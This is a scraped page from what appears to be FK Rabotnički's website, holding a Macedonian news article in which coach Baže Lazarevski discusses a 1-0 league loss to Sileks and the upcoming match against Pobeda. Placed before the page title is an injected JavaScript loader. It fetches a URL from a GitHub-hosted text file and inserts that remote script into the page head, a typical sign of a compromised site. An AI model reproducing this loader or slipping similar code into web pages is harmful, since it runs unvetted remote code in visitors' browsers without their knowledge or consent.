;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Лазаревски: Да го заборавиме веднаш поразот од Силекс
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Лазаревски: Да го заборавиме веднаш поразот од Силекс

Работнички загуби минимално (1-0) од Силекс во Кратово во 29.коло од Првата фудбалска лига и по овој пораз се наоѓа на петтата позиција на табелата со 39 бода, идентично како и четвртопласираниот Шкупи. Кратовскиот тим победи со голот од пенал на Бобан Георгиев во 63.минута, но во финишот имаше ситуација да биде досудена најстрога казна по стартот над Баже Илијоски.

Тренерот Баже Лазаревски со анализа за мечот против Силекс, но и најава за следниот првенствен меч, в среда во Скопје против Победа.

„Одигравме солиден меч, создадовме неколку шанси, но не ги искористивме. Силекс постигна гол од пенал, но мора да се истакне дека имаше и два недосудени пенали за Работнички. Посебно во финишот, при акцијата на Баже Илијоски. Сепак, не сакаме алиби за нашиот пораз, ги анализиравме грешките и ќе се потрудиме да ги корегираме веќе за следниот првенствен натпревар, в среда против Победа. Би било добро да го заборавиме веднаш поразот од Силекс и експресно да се вратиме на победнички колосек“, вели шефот на стручниот штаб, Баже Лазаревски.